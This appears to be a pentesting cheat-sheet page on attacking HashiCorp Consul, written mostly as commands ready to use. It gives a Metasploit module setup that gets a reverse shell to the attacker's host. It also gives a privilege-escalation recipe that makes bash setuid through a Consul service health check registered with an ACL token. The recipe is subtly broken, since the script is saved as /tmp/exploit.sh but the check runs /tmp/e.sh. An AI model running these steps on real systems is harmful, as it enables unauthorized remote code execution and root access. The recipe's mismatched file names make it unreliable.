HashiCorp Consul Pentesting

An open-source service networking platform developed by HashiCorp. A default port is 8500.

Interesting Files in Target System

If we are in the target system, we can investigate the following files:

cat /etc/consul.d/config.json

RCE

Resource: Pentester Academy Blog

Using Metasploit, we may be able to execute command and get a reverse shell. Run the following commands in your local machine.

msfconsole
msf> use exploit/multi/misc/consul_service_exec
msf> set rhosts <target-ip>
msf> set lhost <your-ip>
msf> run
# Session created...
msf> shell # Spawn the shell
whoami # Run command in the target system

Privilege Escalation

If you have the ACL token (xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxx), you may be able to privilege escalation. First, create a script which changes the permission of ‘bash’.

echo 'chmod +s /usr/bin/bash' > /tmp/exploit.sh

Then curl.

curl --header "X-Consul-Token: <ACL-TOKEN>" --request PUT -d '{"ID": "test", "Name": "test", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/e.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register

KV (Key/Value) Store

# Put
consul kv put --token <ACL-TOKEN> key value
consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 path/to/store data

PreviousGrafana Pentesting NextFile upload

Last updated 1 month ago

hashtagInteresting Files in Target System

hashtagRCE

hashtagPrivilege Escalation

hashtagKV (Key/Value) Store

Interesting Files in Target System

RCE

Privilege Escalation

KV (Key/Value) Store